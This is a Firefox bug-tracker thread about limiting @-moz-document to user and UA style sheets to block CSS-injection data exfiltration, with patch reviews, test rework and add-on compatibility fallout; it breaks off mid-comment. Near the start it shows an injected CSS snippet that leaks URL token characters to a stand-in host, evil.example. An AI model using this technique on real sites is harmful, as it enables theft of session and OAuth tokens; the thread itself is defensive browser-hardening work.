Closed Bug 1035091 Opened 10 years ago Closed 7 years ago

limit @-moz-document to user and UA sheets (Makes it useless for exfiltration in CSS-injection attacks)

Categories

(Core :: CSS Parsing and Computation, defect)

defect
Not set
normal

Tracking

()

RESOLVED FIXED
mozilla59
Tracking Status
firefox59 --- fixed

People

(Reporter: freddy, Assigned: emilio, NeedInfo)

References

(Depends on 1 open bug, Blocks 2 open bugs, Regressed 1 open bug)

Details

(Keywords: dev-doc-complete, sec-want, site-compat, Whiteboard: [adv-main59-])

Attachments

(5 files, 13 obsolete files)

51.14 KB, patch
zwol
: review+
Details | Diff | Splinter Review
6.56 KB, patch
heycam
: feedback+
Details | Diff | Splinter Review
49.96 KB, patch
zwol
: review+
zwol
: checkin+
Details | Diff | Splinter Review
2.24 KB, patch
Details | Diff | Splinter Review
59 bytes, text/x-review-board-request
xidorn
: review+
Details
Scriptless attacks (i.e. CSS injections) can be used to leak secret data in the URL (session id, OAuth token) to a third party. If we removed -moz-document completely, this would not be possible. Alternatively, we could stop supporting -moz-document for web content, or we could just remove the regexp() feature. Explanation of scriptless attacks: http://www.nds.rub.de/research/publications/scriptless-attacks/
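A minimal sketch of the exfiltration primitive being described; the host names are hypothetical, and the real attack generates one rule per candidate character (or uses regexp() to do the same in fewer rules):

    /* Injected into a vulnerable page on victim.example; evil.example is the attacker's host. */
    @-moz-document url-prefix("https://victim.example/account?token=a") {
      body { background-image: url("https://evil.example/leak?first-char=a"); }
    }
    @-moz-document url-prefix("https://victim.example/account?token=b") {
      body { background-image: url("https://evil.example/leak?first-char=b"); }
    }
    /* ...and so on; whichever rule matches triggers a request that reveals the character. */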
If this attack is a serious threat, I'd be ok with restricting @-moz-document to user and UA style sheets. That said, isn't the attack only present when sites that should be doing input sanitizing before including user-provided content in their page are either not doing it or doing it using an approach other than a whitelist-based one?
I think this attack is bad enough that we should think about reducing the threat. AFAIU -moz-document was considered for CSS3 but did not make it. It doesn't seem there are any plans to bring it up again. The attack *does* require a style injection on a web page, but I think this is a weaker assumption than needing a script injection (XSS).
(In reply to Frederik Braun [:freddyb] from comment #2)
> AFAIU -moz-document was considered for CSS3 but did not make it.

It was dropped because I (as the editor of the spec) proposed dropping it: it wasn't clear to me what the right way to specify URL equality was (what normalizations are and are not performed, etc.), and I wanted to advance the other features in the spec faster.

> It doesn't seem there are any plans to bring it up again.

I don't think that's the case.
(That's as proposed in http://lists.w3.org/Archives/Public/www-style/2012Aug/0749.html and resolved in http://lists.w3.org/Archives/Public/www-style/2012Oct/0275.html ; it's currently commented out in the spec source rather than removed, with the comments noting that it's planned for Level 4.)
(In reply to Frederik Braun [:freddyb] from comment #2)
> The attack *does* require a style injection on a web page, but I think this
> is a weaker assumption than needing a script injection (XSS).

I'd also like to get a better understanding of what assumptions we're making about style injection. What do we expect developers to do and not to do when sanitizing CSS from untrusted sources to include in their Web content?
Keywords: sec-want
Summary: make -moz-document useless for scriptless attacks → Make -moz-document useless for exfiltration in CSS-injection attacks
Thanks for providing the context with the specification status, David!

(In reply to David Baron [:dbaron] (UTC-7) (needinfo? for questions) from comment #6)
> I'd also like to get a better understanding of what assumptions we're making
> about style injection. What do we expect developers to do and not to do
> when sanitizing CSS from untrusted sources to include in their Web content?

There aren't as many CSS sanitizers as there are for HTML/JS. Google Caja just strips styles, keeping only those allowed by a whitelist (default here: https://code.google.com/p/google-caja/source/browse/trunk/src/com/google/caja/plugin/sanitizecss.js#370). The most common things sanitizers currently look out for are expression() (the legacy IE directive to execute JavaScript from styles) and -moz-binding (not available to web content anymore); cf. https://code.google.com/p/google-caja/wiki/AttackVectors.

The current rationale in the security community is that injected CSS cannot harm the user as much as injected scripts do. My understanding is that -moz-document poses a surprise here.
I'm fine with limiting @-moz-document to user and UA sheets for now.
Summary: Make -moz-document useless for exfiltration in CSS-injection attacks → limit @-moz-document to user and UA sheets (Makes it useless for exfiltration in CSS-injection attacks)
David, I know my way around the code base, but I'm not sure whether I can take this one (I have never touched Document/CSS things). If there are similar bugs to this one, I can still give it a try. If you think this isn't a good second bug, can you help us find an owner for it?
Status: UNCONFIRMED → NEW
Ever confirmed: true
Flags: needinfo?(dbaron)
This is a perfectly fine second bug. The one tricky bit is that I don't think either of the existing mUnsafeRulesEnabled or mIsChromeOrCertifiedApp booleans in the CSS parser will match what's needed here, so you'd need to add a mechanism for the CSS parser to know whether it's parsing a UA or user sheet rather than an author sheet. (It's possible that the boolean aAllowUnsafeRules could be changed to an nsStyleSet::sheetType.)
Flags: needinfo?(dbaron)
I'm new to the CSS code, so here's my understanding of the code and my interpretation of your suggestion. Please correct me if I'm wrong. A sheet parser is told whether it should allow specific CSS rules depending on the current context. This happens in CSSParserImpl::ParseSheet, which gets aAllowUnsafeRules as a bool parameter (this sets mUnsafeRulesEnabled). mUnsafeRulesEnabled is then consulted to decide whether to accept certain tokens in CSS properties and selectors. So the suggestion is to rewrite the declaration of ParseSheet to accept a sheetType instead of the boolean aAllowUnsafeRules. Would this mean removing mUnsafeRulesEnabled completely or just overwriting it with something based on the incoming sheet type? If so, I'm not sure what the decision tree would look like.
Flags: needinfo?(dbaron)
(In reply to Frederik Braun [:freddyb] from comment #11)
> Would this mean removing mUnsafeRulesEnabled completely or just overwriting
> it with something based on the incoming sheet type? If so, I'm not sure
> what the decision tree would look like.

Removing it completely, and probably replacing its uses with an inline function AllowUnsafeRules() that tests whether mSheetType == eAgentSheet. I didn't look at the callers to see whether this actually is a sensible thing to do, so it might not be. But if it turns out to be easy then it's probably the right approach; if it's not, we should find an alternative.

Also note that bug 1011738 is changing the same code.
Flags: needinfo?(dbaron)
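A rough sketch of the shape being proposed in the comment above; the member and helper names here are illustrative, not the actual patch:

    // Hypothetical sketch inside CSSParserImpl.  mParsingSheetType would be
    // set from the ParseSheet() argument that replaces the old
    // aAllowUnsafeRules boolean.
    nsStyleSet::sheetType mParsingSheetType;

    bool AllowUnsafeRules() const {
      // UA-only properties and selectors stay restricted to agent sheets.
      return mParsingSheetType == nsStyleSet::eAgentSheet;
    }

    bool AllowDocumentRule() const {
      // What this bug wants: @-moz-document only in agent and user sheets.
      return mParsingSheetType == nsStyleSet::eAgentSheet ||
             mParsingSheetType == nsStyleSet::eUserSheet;
    }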
I'll give it a try.
Assignee: nobody → fbraun
We should really try to do this. Sites are sending us Firefox-only CSS using this stuff, and it's often broken (e.g. see bug 1172991). Frederik, are you still working on this?
Flags: needinfo?(fbraun)
If this is going undone for lack of anyone to do it, I might be able to free up some time to do it.
Sorry, I am unlikely to find the time before I go on paternity leave in July. Unassigning myself. I would be delighted if you could take this, Zack.
Flags: needinfo?(fbraun)
Assignee: fbraun → nobody
Assigning to self so I don't lose it. Expect a patch early next week unless this turns into one of those things where you pull a thread and the entire sweater unravels; it seems to be my fate to pick those bugs. :-/
Assignee: nobody → zackw
Status: NEW → ASSIGNED
This is, in fact, a medium-sized mess.

First off, none of the objects associated with a single style sheet appears to carry the sheet type. Right now, that's strictly an nsStyleSet datum.

mIsChromeOrCertifiedApp does not correspond to any style sheet type as far as I can tell. It is currently being set true by CSSParserImpl::ParseSheet (and _only_ ParseSheet) if and only if

  dom::IsChromeURI(aSheetURI) || aSheetPrincipal->GetAppStatus() == nsIPrincipal::APP_STATUS_CERTIFIED;

mUnsafeRulesEnabled is much more complicated. It is set true, again, by CSSParserImpl::ParseSheet and _only_ ParseSheet, if the aAllowUnsafeRules argument to that function is true. This happens in two contexts:

* called from CSSStyleSheet::ParseSheet, when the sheet principal is the system principal;
* called from css::Loader::ParseSheet, when aLoadData->mAllowUnsafeRules is true.

SheetLoadData::mAllowUnsafeRules can become true when the load data is created by css::Loader::LoadChildSheet and the parent sheet already has load data and its mAllowUnsafeRules is true, or when the load data is created by css::Loader::InternalLoadNonDocumentSheet and the aAllowUnsafeRules argument to _that_ is true. (Note inconsistency: sheets @imported from a privileged sheet created by css::Loader::InternalLoadNonDocumentSheet will have mAllowUnsafeRules true, but sheets @imported from a privileged sheet created by CSSStyleSheet::ParseSheet will _not_, because in the latter case the parent sheet has no load data.)

InternalLoadNonDocumentSheet is called with aAllowUnsafeRules true only when css::Loader::LoadSheetSync (4-arg overload) is called with aAllowUnsafeRules true. The 4-arg form of LoadSheetSync is called all over the damn place. It does not appear, on a skim, that "aAllowUnsafeRules true" is equivalent to "sheet principal is the system principal" _or_ to "the sheet type is eAgentSheet." (Note that the _other_ boolean argument to LoadSheetSync says whether to use the system principal for the sheet.)

----

There are also a distressingly large number (i.e. "at least two, maybe more") of places that load sheets that are considered to be "user" sheets. However, those that I found (nsLayoutStylesheetCache::InitFromProfile and nsStyleSheetService::LoadAndRegisterSheet, the latter of which doesn't appear to be used in-tree -- is it just for extensions?) consistently go through LoadSheetSync with aAllowUnsafeRules=false and aUseSystemPrincipal=true. So possibly a way forward is to change LoadSheetSync and then propagate the API change in both directions. I have to think some more about that. I don't presently see a good way to subsume mIsChromeOrCertifiedApp into this scheme, since its current semantics are decidedly not context-aware.

----

Finally, what-all is this currently being *used* for?
mUnsafeRulesEnabled enables:

* Properties with CSS_PROPERTY_ALWAYS_ENABLED_IN_UA_SHEETS, all of which can also be exposed to content via prefs:
  (layout.css.vertical-text-enabled) block-size border-block-end border-block-end-color border-block-end-style border-block-end-width border-block-start border-block-start-color border-block-start-style border-block-start-width inline-size margin-block-end margin-block-start max-block-size max-inline-size min-block-size min-inline-size offset-block-end offset-block-start offset-inline-end offset-inline-start padding-block-end padding-block-start text-combine-upright text-orientation writing-mode
  (layout.css.object-fit-and-position.enabled): object-fit object-position
  (layout.css.overflow-clip-box.enabled): overflow-clip-box

* The script-level and math-display properties; I *think* these are handled separately from the CSS_PROPERTY_ALWAYS_ENABLED_IN_UA_SHEETS mechanism because that would require exposing a pref to turn them on for content. (Comments suggest that misuse of these can violate rule node invariants.)

* Pseudo-elements and pseudo-classes for which PseudoElementIsUASheetOnly / PseudoClassIsUASheetOnly, respectively, are true. There is no way to expose these to content via prefs:
  :-moz-native-anonymous ::-moz-number-wrapper ::-moz-number-text ::-moz-number-spin-box ::-moz-number-spin-up ::-moz-number-spin-down

* All the pseudo-elements for which GetPseudoType returns ePseudo_AnonBox, which I think is equivalent to "everything in nsCSSAnonBoxList.h". Again, there is no way to expose these to content via prefs.

mIsChromeOrCertifiedApp enables:

* Properties with CSS_PROPERTY_ALWAYS_ENABLED_IN_CHROME_OR_CERTIFIED_APP, which can be exposed to content via prefs:
  (layout.css.will-change.enabled) will-change
OK, that turned out not to be that bad after all -- I think I spent more time on the tests than anything else. Try server running: https://treeherder.mozilla.org/#/jobs?repo=try&revision=27be88ae310d
This patch changes the CSS parser and loader APIs to distinguish user style sheets from UA and normal ("author") sheets. It uses nsIStyleSheetService's constants for this. (There are *three* other definitions of constants that could be used: in nsIDocument, in nsIDOMWindowUtils, and in nsStyleSet. I just picked one arbitrarily. I do not have time to go on a refactoring rampage, alas.) This patch should cause absolutely no behavioral changes.
Attachment #8622010 - Flags: review?(cam)
And this patch turns off @-moz-document in author sheets. The bulk of it is rejiggering test cases so they still work. I had a bunch of notes on what changed and why, but I cleverly closed that scratchpad before posting :-( The basic idea is, any test that wants to do anything with @-moz-document has to have chrome privileges so it can use nsIDOMWindowUtils.loadSheet to load a user style sheet that will go away with the document. It was convenient to throw them all in layout/style/test/chrome. A small number of tests were dropped without replacement -- these were trying to do things for which there is no equivalent, like use @-moz-document in <style scoped>. Since this used to work and we know people were trying to use it as a browser discriminator, I added a specific error message for @-moz-document in an author sheet.
Attachment #8622011 - Flags: review?(cam)
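For reference, the pattern such chrome tests use looks roughly like this; the data: URL, the assertions, and the boilerplate are placeholders rather than the actual test content:

    // Hypothetical sketch of a chrome mochitest loading a document-scoped user sheet.
    const Cc = Components.classes, Ci = Components.interfaces;
    const utils = window.QueryInterface(Ci.nsIInterfaceRequestor)
                        .getInterface(Ci.nsIDOMWindowUtils);
    const io = Cc["@mozilla.org/network/io-service;1"].getService(Ci.nsIIOService);

    const sheet = io.newURI(
      "data:text/css,@-moz-document domain('mochi.test') { p { color: green } }",
      null, null);

    utils.loadSheet(sheet, utils.USER_SHEET);   // parsed with user-sheet features
    // ... assert that getComputedStyle() shows the rule applied ...
    utils.removeSheet(sheet, utils.USER_SHEET); // goes away with the test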
Oh, the other non-obvious thing about the test suite changes: It is now impossible to use the CSSOM to create a @-moz-document rule. This is because the parser entry points that back CSSOM mutations always parse the new construct as if it were in an author style sheet; it doesn't matter what the sheet being modified is. Changing that would be a much larger and more invasive project.
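A short illustration of that limitation (a hypothetical snippet, not one of the tests): even though the rule text would be valid in a user or UA sheet, inserting it through CSSOM goes through the author-sheet parsing path and is rejected.

    // Hypothetical illustration; the selector and declarations are arbitrary.
    const style = document.createElement("style");
    document.head.appendChild(style);
    try {
      style.sheet.insertRule(
        "@-moz-document domain('example.com') { p { color: red } }", 0);
    } catch (e) {
      // Expected: a SyntaxError, because the CSSOM entry points always parse
      // new rules as if the sheet were an author sheet, whatever it really is.
    }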
Argh. Mercurial has mysteriously stopped showing "unknown" files by default in "hg st". This caused me to forget to add two new test files, which in turn caused mach to throw all its toys out of the pram. New try server run: https://treeherder.mozilla.org/#/jobs?repo=try&revision=92005e16c12e
Attachment #8622011 - Attachment is obsolete: true
Attachment #8622011 - Flags: review?(cam)
Attachment #8622012 - Flags: review?(cam)
Testing revealed some small problems with both patches; this revision addresses them. In this patch, the only change from the original is using MOZ_CRASH instead of MOZ_ASSERT in an impossible default case of a switch, so that the compiler does not give a spurious used-uninitialized warning in opt builds.
Attachment #8622010 - Attachment is obsolete: true
Attachment #8622010 - Flags: review?(cam)
Attachment #8622081 - Flags: review?(cam)
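The MOZ_CRASH-versus-MOZ_ASSERT point above, spelled out; the identifiers are placeholders, not the actual patch:

    // Hypothetical sketch of the pattern described in the comment above.
    ParsingMode mode;
    switch (aSheetType) {
      case nsIStyleSheetService::AGENT_SHEET:
        mode = eAgentMode;
        break;
      case nsIStyleSheetService::USER_SHEET:
        mode = eUserMode;
        break;
      case nsIStyleSheetService::AUTHOR_SHEET:
        mode = eAuthorMode;
        break;
      default:
        // A MOZ_ASSERT here compiles away in opt builds, leaving `mode`
        // apparently uninitialized and producing a spurious warning;
        // MOZ_CRASH documents the impossibility and satisfies the compiler.
        MOZ_CRASH("unknown sheet type");
    }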
The only change in this version of this patch is to tests, but there's an actual problem which needs to be addressed. editor/libeditor/tests/test_bug520189.html tests, among other things, that a @-moz-document rule in a <style> pasted into a contenteditable does not survive sanitization. I assumed that this would continue working and did not test it locally. It does technically still work, but it hits an edge case in the sanitizer which makes the test fail. Before the patch, the CSS parser recognizes the @-moz-document rule and gives the sanitizer a style sheet object containing one rule. The sanitizer then throws away that rule as it's not on its whitelist, so the modified document ends up with an empty <style> tag, which is what the test case looks for. After the patch, the CSS parser does not recognize the @-moz-document rule so it gives the sanitizer a style sheet object containing *zero* rules. This causes the sanitizer to use the original pasted text as the contents of the <style> tag. The sanitization still works in that the @-moz-document rule has no effect, but the test is looking at the contents of the <style> so it fails. For now I just flipped the sense of the two subtests that fail. I am pinging Ehsan re what the sanitizer should actually *do* in this case, and I propose to file a follow-up bug about that.
Flags: needinfo?(ehsan)
Attachment #8622082 - Flags: review?(cam)
Attachment #8622012 - Attachment is obsolete: true
Attachment #8622012 - Flags: review?(cam)
Try server runs for the current set of patches: https://treeherder.mozilla.org/#/jobs?repo=try&revision=604a39bf2d4d # part 1 only https://treeherder.mozilla.org/#/jobs?repo=try&revision=8c29d947f028 # part 1+2 These results look good to me.
I wonder if we shouldn't be allowing add-ons to load sheets with unsafe rules enabled (= AGENT_SHEET type, after these patches), since that allows them to mess with the MathML-related properties.
Comment on attachment 8622081 [details] [diff] [review] Patch 1/2 v1a: distinguish UA, user, author sheets in the CSS loader, parser API

Review of attachment 8622081 [details] [diff] [review]:
-----------------------------------------------------------------

I think it's a bit confusing that we're using constants like "AUTHOR_SHEET" that imply the level that the sheet will be inserted into the style set. For some APIs, like the style sheet service, we always enable the set of features according to the level we're asked to parse and insert the sheet into, but there are a number of cases where we're parsing with author sheet features enabled but adding the sheet at the agent level.

So I think we want to describe the set of features that are enabled. What do you think about having an enum with names like eAgentSheetFeatures, eUserSheetFeatures, eAuthorSheetFeatures, and using that for the Loader/nsCSSParser arguments?

r=me if you agree and do this, plus the one nit below.

::: dom/base/nsDocument.cpp
@@ +4426,5 @@
>
> +  unsigned long loaderType;
> +  switch (aType) {
> +  case nsIDocument::eAgentSheet:
> +    loaderType = nsIStyleSheetService::AGENT_SHEET; break;

Per the style guide, please indent case labels by a level. Would rather the break statements on their own lines, too.

(I was going to suggest using the nsIDocument constants would have been better, since then we could use an enum in various places rather than a plain integer, but giving nsCSSParser a dependency on nsIDocument probably isn't great.)

::: dom/xbl/nsXBLPrototypeResources.cpp
@@ +93,5 @@
>
>   nsRefPtr<CSSStyleSheet> newSheet;
>   if (IsChromeURI(uri)) {
> +    // XXX Should this be parsed as an agent sheet (allowed to style
> +    // anon boxes, etc)?

Can't think of a reason to allow this.

::: layout/base/nsDocumentViewer.cpp
@@ +2254,5 @@
>                                             baseURI);
>     if (!uri) continue;
>
> +    // XXX Should this be parsed as an agent sheet (allowed to style
> +    // anon boxes, etc)?

Yeah, no idea who if anyone is using usechromesheets="". Probably best to leave this as USER_SHEET.
Attachment #8622081 - Flags: review?(cam) → review+
Comment on attachment 8622082 [details] [diff] [review] Patch 2/2 v1a: disable @-moz-document in author sheets

Review of attachment 8622082 [details] [diff] [review]:
-----------------------------------------------------------------

::: layout/style/test/test_css_eof_handling.html
@@ -191,5 @@
> -  {
> -    name: "@-moz-document 2",
> -    ref: "@-moz-document domain('example.com') { p {} }",
> -    tst: "@-moz-document domain('example.com') { p {"
> -  }

These test_css_eof_handling.html subtests didn't seem to get added to the new chrome tests. Was that deliberate?
Attachment #8622082 - Flags: review?(cam) → review+
(In reply to Zack Weinberg (:zwol) from comment #25)
> Created attachment 8622082 [details] [diff] [review]
> Patch 2/2 v1a: disable @-moz-document in author sheets
>
> The only change in this version of this patch is to tests, but there's an
> actual problem which needs to be addressed.
> editor/libeditor/tests/test_bug520189.html tests, among other things, that a
> @-moz-document rule in a <style> pasted into a contenteditable does not
> survive sanitization. I assumed that this would continue working and did
> not test it locally. It does technically still work, but it hits an edge
> case in the sanitizer which makes the test fail.
>
> Before the patch, the CSS parser recognizes the @-moz-document rule and
> gives the sanitizer a style sheet object containing one rule. The sanitizer
> then throws away that rule as it's not on its whitelist, so the modified
> document ends up with an empty <style> tag, which is what the test case
> looks for.
>
> After the patch, the CSS parser does not recognize the @-moz-document rule
> so it gives the sanitizer a style sheet object containing *zero* rules.
> This causes the sanitizer to use the original pasted text as the contents of
> the <style> tag. The sanitization still works in that the @-moz-document
> rule has no effect, but the test is looking at the contents of the <style>
> so it fails.
>
> For now I just flipped the sense of the two subtests that fail. I am
> pinging Ehsan re what the sanitizer should actually *do* in this case, and I
> propose to file a follow-up bug about that.

I think this is fine, but please add a comment to the test explaining that even though @-moz-document is not filtered away, it's safe as it won't have any effect.
Flags: needinfo?(ehsan)
Blocks: 1177533
Blocks: 1177538
(In reply to Cameron McCormack (:heycam) from comment #27)
> I wonder if we shouldn't be allowing add-ons to load sheets with unsafe
> rules enabled (= AGENT_SHEET type, after these patches), since that allows
> them to mess with the MathML-related properties.

That might turn out to have nasty compat implications, but yeah. Filed bug 1177533.

(In reply to Cameron McCormack (:heycam) from comment #28)
> I think it's a bit confusing that we're using constants like "AUTHOR_SHEET"
> that imply the level that the sheet will be inserted into the style set.
> For some APIs, like the style sheet service, we always enable the set of
> features according to the level we're asked to parse and insert the sheet
> into, but there are a number of cases where we're parsing with author sheet
> features enabled but adding the sheet at the agent level.
>
> So I think we want to describe the set of features that are enabled. What
> do you think about having an enum with names like eAgentSheetFeatures,
> eUserSheetFeatures, eAuthorSheetFeatures, and using that for the
> Loader/nsCSSParser arguments?

Good point. I put the enum in Loader.h, which is also a much more convenient header for the various places that need it to find it in. And being a real enum, it shook out a number of places where I'd flubbed the conversion. This does mean we now have *four* sets of constants related to "what kind of sheet is this?" but that's a follow-up bug, I think. (Filed bug 1177358.)

> > +  unsigned long loaderType;
> > +  switch (aType) {
> > +  case nsIDocument::eAgentSheet:
> > +    loaderType = nsIStyleSheetService::AGENT_SHEET; break;
>
> Per the style guide, please indent case labels by a level. Would rather the
> break statements on their own lines, too.

Done.

> > +    // XXX Should this be parsed as an agent sheet (allowed to style
> > +    // anon boxes, etc)?
>
> Can't think of a reason to allow this.

OK, I have removed the comment.

> ::: layout/base/nsDocumentViewer.cpp
> @@ +2254,5 @@
> >                                             baseURI);
> >     if (!uri) continue;
> >
> > +    // XXX Should this be parsed as an agent sheet (allowed to style
> > +    // anon boxes, etc)?
>
> Yeah, no idea who if anyone is using usechromesheets="". Probably best to
> leave this as USER_SHEET.

Ditto.
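The enum as described ends up looking roughly like this; a sketch built from the names in this exchange, not a verbatim quote of the landed header:

    // Sketch of the SheetParsingMode enum in mozilla::css (Loader.h).
    // It names the *feature set* used while parsing, not the cascade
    // level the sheet is inserted at.
    enum SheetParsingMode {
      eAuthorSheetFeatures, // rules available to ordinary web content
      eUserSheetFeatures,   // author features plus @-moz-document
      eAgentSheetFeatures   // user features plus UA-only properties,
                            // anon-box pseudos, etc.
    };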
(In reply to Cameron McCormack (:heycam) from comment #29)
> @@ -191,5 @@
> > -  {
> > -    name: "@-moz-document 2",
> > -    ref: "@-moz-document domain('example.com') { p {} }",
> > -    tst: "@-moz-document domain('example.com') { p {"
> > -  }
>
> These test_css_eof_handling.html subtests didn't seem to get added to the
> new chrome tests. Was that deliberate?

Yes, it is my opinion that other tests adequately cover this case (in particular, the very similar tests for @media).

(In reply to Ehsan Akhgari (not reviewing patches, not reading bugmail, needinfo? me!) from comment #30)
> (In reply to Zack Weinberg (:zwol) from comment #25)
> > For now I just flipped the sense of the two subtests that fail. I am
> > pinging Ehsan re what the sanitizer should actually *do* in this case, and I
> > propose to file a follow-up bug about that.
>
> I think this is fine, but please add a comment to the test explaining that
> even though @-moz-document is not filtered away, it's safe as it won't have
> any effect.

I thought about it some more and I have changed these to todo_is() with the original sense, and filed bug 1177546 on the "what should this actually do?" aspect.
Try server run in progress: https://treeherder.mozilla.org/#/jobs?repo=try&revision=86cc858d4df4 Earlier mention of bug 1177358 should read bug 1177538; at least I got it right in the actual dependency tree.
Try server is green, so here is the revised patchset. 1/2 changed enough to be worth checking over once more, I think.
Attachment #8622081 - Attachment is obsolete: true
Attachment #8626392 - Flags: review?(cam)
Only change to this one is as discussed in comment 32, carrying r=cam forward.
Attachment #8622082 - Attachment is obsolete: true
Attachment #8626394 - Flags: review+
I'd like to see this land sooner rather than later -- any progress on the review, or should I take it over?
Flags: needinfo?(cam)
I planned to look at this next week.
Comment on attachment 8626392 [details] [diff] [review] Patch 1/2 v2: distinguish UA, user, author sheets in the CSS loader, parser API

Review of attachment 8626392 [details] [diff] [review]:
-----------------------------------------------------------------

This looks great. Thanks for cleaning this up! The comment on the SheetParsingMode enum is particularly helpful.

::: layout/style/Loader.cpp
@@ +223,5 @@
> +  // are not safe for use on the public Web but necessary in UA sheets
> +  // and/or useful in user sheets. The only values stored in this
> +  // field are 0, 1, and 2; three bits are allocated to avoid issues
> +  // should the enum type be signed.
> +  SheetParsingMode mParsingMode : 3;

That's annoying. And using a sized enum, like |enum SheetParsingMode : uint8_t|, results in compiler warnings about the enum not fitting in a bitfield smaller than 8 bits wide. Oh well.
Attachment #8626392 - Flags: review?(cam) → review+
Flags: needinfo?(cam)
The patches needed minor fixups to apply to current trunk. There are no substantive changes. I will land these after -inbound reopens.
Attachment #8626392 - Attachment is obsolete: true
Attachment #8656119 - Flags: review+
Attachment #8656120 - Flags: review+
https://hg.mozilla.org/integration/mozilla-inbound/rev/f6e98029d1cb3b7f40dd427802f98223f9c2e419
Bug 1035091 part 1: change CSS parser and loader APIs to distinguish UA, user, and author sheets instead of just UA vs everyone else. r=heycam

https://hg.mozilla.org/integration/mozilla-inbound/rev/1fc07bdd9aa8d04a50c5f77956638bc452df45c5
Bug 1035091 part 2: disable @-moz-document in author sheets. r=heycam
Depends on: 1201420
Status: ASSIGNED → RESOLVED
Closed: 9 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla43
I have added everyone from bug 1201420 to the cc: list of this bug so we can work out how best to proceed.

I did some debugging on a trunk build with the existing patches reapplied and Classic Theme Restorer installed. It turns out that nsIStyleSheetService::loadAndRegisterSheet(AGENT_SHEET) *does* cause the sheet to be parsed in agent-sheet mode (as it always did). That leaves us with two bugs, one easy and one hard.

The easy bug, which IIUC affects Stylish and maybe others, but *not* CTR, is that ::loadAndRegisterSheet(AUTHOR_SHEET) used to produce a sheet in which @-moz-document was available (but not the special box pseudo selectors and so on). Since loadAndRegisterSheet is used exclusively by addons, we can preserve backward compatibility for that case by treating all such sheets as *user* sheets for parsing.

The hard bug, which affects CTR, is: CTR loads chrome://classic_theme_restorer/content/overlay.css, containing @-moz-document rules, from its .../overlay.xul with a <?xml-stylesheet?> directive. *That* sheet was formerly being processed as an *agent* sheet but has now been demoted all the way to an author sheet. This is exactly the case that Cameron was worried about (bug 1201420 comment 24):

> Hopefully it is OK to disable @-moz-document in style sheets loaded through
> means that content pages have, like <?xml-stylesheet?>, <link>, and <style>,
> even if those nodes are inserted into the document by an add-on, since
> there's not going to be a way to tell that these nodes were inserted by an
> add-on. Then, for all style sheets loaded through the style sheet service
> (which I think captures those loaded through the catalog manager too?),
> @-moz-document can be enabled, regardless of whether AGENT_SHEET, USER_SHEET
> or AUTHOR_SHEET is used.

I am wondering whether we maybe *can* cause <?xml-stylesheet?>, <link>, and <style> to load agent sheets (not in terms of the cascade, just the parsing mode) when they are invoked from chrome XUL. I am not sure how to *know* whether the parent document is chrome XUL, though. (The SheetLoadData object for this style load has its mLoaderPrincipal set to the system principal, but mUseSystemPrincipal is false; it should be possible to get to the document object from mOwningElement but I don't know how.)

This might still break add-ons that inject style nodes into *content* documents but I think those have better alternatives. It's my understanding of the discussion in 1201420 that there aren't good alternatives for add-ons that want to style the chrome.
Slight correction: I misread the code in style/Loader.cpp. Sheets loaded from <?xml-stylesheet?> have always been treated as author sheets (before the patch: mUnsafeRulesEnabled = false), so again it's only the behavior of @-moz-document that has changed.
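For context, the add-on entry point being discussed; a sketch only, with a placeholder URL, and the registration/unregistration pattern shown for completeness:

    // Hypothetical sketch of how add-ons like Stylish register sheets.
    const sss = Components.classes["@mozilla.org/content/style-sheet-service;1"]
                          .getService(Components.interfaces.nsIStyleSheetService);
    const io = Components.classes["@mozilla.org/network/io-service;1"]
                         .getService(Components.interfaces.nsIIOService);

    const uri = io.newURI("chrome://my-addon/content/userstyle.css", null, null);

    // Before this bug, a sheet registered as AUTHOR_SHEET could still use
    // @-moz-document; the compromise proposed above is to parse everything
    // loaded through this service with at least user-sheet features.
    sss.loadAndRegisterSheet(uri, sss.AUTHOR_SHEET);
    // ...later...
    if (sss.sheetRegistered(uri, sss.AUTHOR_SHEET)) {
      sss.unregisterSheet(uri, sss.AUTHOR_SHEET);
    }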
This might be a fix for the issues found in bug 1201420. I've developed it as a separate patch for ease of review but I would squash it into patch 1/2 for landing. This change has undergone only cursory testing, viz. the *obvious* glitches in Minefield+CTR were gone after adding this patch. Once try builds are available, I would appreciate it if authors of affected add-ons could test out their work in those builds, to make sure we didn't miss anything. I would also appreciate assistance in writing some new test cases which would have caught this regression. As I said, I know next to nothing about add-on development; moreover I know nothing at all about testing add-ons in tree.
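The core idea of the candidate fix, roughly; this is a sketch of the approach, not the patch itself, and the surrounding variable names are assumptions:

    // Sketch: in css::Loader, when creating the SheetLoadData for a sheet
    // referenced by a node (<?xml-stylesheet?>, <link>, <style>), upgrade the
    // parsing mode if the owning document itself is chrome.
    nsIURI* docURI = aDocument ? aDocument->GetDocumentURI() : nullptr;
    if (mParsingMode == eAuthorSheetFeatures && docURI && dom::IsChromeURI(docURI)) {
      // Sheets referenced from chrome documents keep @-moz-document working
      // (bug 1201420), even though they still cascade as author sheets.
      mParsingMode = eUserSheetFeatures;
    }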
(In reply to Zack Weinberg (:zwol) from comment #44)
> Since loadAndRegisterSheet is used exclusively by addons, we can
> preserve backward compatibility for that case by treating all such sheets as
> *user* sheets for parsing.

To confirm, is this only in parsing mode and not in the cascade as well?

> CTR loads
> chrome://classic_theme_restorer/content/overlay.css, containing
> @-moz-document rules, from its .../overlay.xul with a <?xml-stylesheet?>
> directive.

That just happens to use the same file to style two different documents using separate @-moz-document blocks. I think it would be fairly simple to split overlay.css and all the overlayextra.css's (imported) each into two separate files, one with the main window's declarations to be loaded there, and another for CTR's options dialog declarations. The @-moz-document's could be safely removed then. The common parts (very little code) could either be appended to both sheets, or loaded separately in a third sheet through a new xml-stylesheet node. Aris, am I way off? :) (Only the "style chrome://global/content/customizeToolbar.xul[...]" in chrome.manifest would be left, which I don't think that sheet is doing much for already though.)

Both approaches (letting nodes-loaded sheets use @-moz-document and splitting CTR's files) would be backwards compatible, both imply some work... Only the latter seems to fall more into dbaron's words from bug 1201420 comment 1: "[...]I'd like what we do for Chrome not to diverge unnecessarily from the Web[...]". This all to say:

> I am wondering whether we maybe *can* cause <?xml-stylesheet?>, <link>, and
> <style> to load agent sheets (not in terms of the cascade, just the parsing
> mode) when they are invoked from chrome XUL.

IMO if it turns out it needs too much work to do this, it might not be worth pursuing. To style multiple content documents with the same external stylesheet you're much better off using the stylesheet service. To do the same for chrome documents is also probably easier through the service, but using nodes is also possible, as in the CTR example above. Otherwise, I certainly won't oppose. :) (This only applies to *external* and *constantly* loaded sheets! Not to dynamically built data: strings sheets or those that need to be enabled/disabled at will as discussed in bug 1201420!)

> I would also appreciate assistance in writing some new test cases which
> would have caught this regression. As I said, I know next to nothing about
